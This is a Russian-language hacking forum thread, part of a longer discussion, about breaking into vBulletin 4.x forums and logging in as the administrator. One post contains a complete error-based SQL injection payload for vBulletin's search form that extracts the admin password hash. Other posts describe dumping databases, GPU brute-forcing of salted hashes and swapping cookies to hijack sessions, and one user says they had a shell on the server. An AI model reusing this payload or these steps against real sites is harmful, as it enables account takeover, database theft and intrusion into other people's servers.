Взлом vBulletin 4.x.x с последующией авторизацией в админский аккаунт

Discussion in 'Песочница' started by p0wER, 30 Mar 2012.

  1. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Какой к примеру?
     
  2. Onths

    Onths New Member

    Joined:
    3 May 2012
    Messages:
    57
    Likes Received:
    2
    Reputations:
    -4
    Да как угодно.
    Можно вывести соль и пароль определенного юзера, а можно слить себе б.д и искать там, если есть такая возможность.

    Брути обычным брутом по видяхе.
     
  3. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Не в обиду ТС конечно, но нахер такую тему.
     
    _________________________
  4. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Базу уже слил,а вот как пароль там искать не пойму.
     
  5. Skipp

    Skipp New Member

    Joined:
    12 May 2010
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, подскажите как получить эту самую страницу с ошибкой, о которой пишет автор (выделено зелёным цветом). Я делал как в статье, в Live HTTP Replay в Post запрос дописывал код
    Code:
    humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
    нажимаю повтор, а затем обновляю в Мозиле страницу с поиском??? Но ошибку на ней не выводит (вот здесь я может не то что-то делаю?)... Пробовал на разных версиях vBulletin
     
  6. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    может пофикшенная версия, может все таки ты что то не так делал, возможно пробелы не убрал , когда копировал запрос(форум имеет свойство поставить пробел в слове),
     
    _________________________
  7. Dr.Strangelove

    Joined:
    1 Dec 2008
    Messages:
    111
    Likes Received:
    61
    Reputations:
    -6
    мда.. ачат уже не тот, что ранее
     
  8. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    Еще бы.В этой теме идет подмена кук, содержащих хэш залогиненного юзера, а это боян страшнейший.
     
  9. Loller

    Loller New Member

    Joined:
    20 Jun 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Я извиняюсь за беспокойство, но мне не понятен один пункт.
    Идем на сайт lj.onas/md5 и делаем все, что там написано

    Что вписывать в поле здесь пишем свой текст, из которого надо получить md5?

    Спасибо за ответ.
     
  10. bri

    bri New Member

    Joined:
    4 Jun 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    ne aktualno
     
    #30 bri, 3 Feb 2013
    Last edited: 10 Feb 2013
  11. sviftgraf

    sviftgraf New Member

    Joined:
    13 Feb 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Думаю не только у меня был шелл на данном сервере.
     
  12. flying stranger

    flying stranger New Member

    Joined:
    19 Jul 2020
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    здравствуйте за поздний час, все же, думаю, что тема все еще актуальна и стоит продолжить.
    Сделал регистрацию чисто из-за того, чтобы посмотреть эти самые картинки опубликованные автором темы, которые не отображаются, видимо, их удалили. Только текст прочел и сам смысл понял.
    Может, поможете?
     
  13. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    quite gray likes this.
  14. flying stranger

    flying stranger New Member

    Joined:
    19 Jul 2020
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Спасибо. Не знаете, где скачать старую версию Live HTTP Headers? Нигде не нахожу. Если есть, скиньте ссылку пожалуйста
     
Loading...